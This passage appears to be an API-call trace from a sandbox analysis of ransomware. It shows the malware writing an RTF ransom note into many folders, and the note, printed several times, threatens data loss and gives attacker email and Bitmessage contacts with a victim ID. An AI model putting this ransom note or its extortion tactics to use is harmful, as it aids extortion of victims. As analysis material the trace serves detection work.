g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.583] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.584] CloseHandle (hObject=0x2c8) returned 1 [0278.584] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\#readme_eman#.rtf")) returned 0xffffffff [0278.584] GetLastError () returned 0x2 [0278.584] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 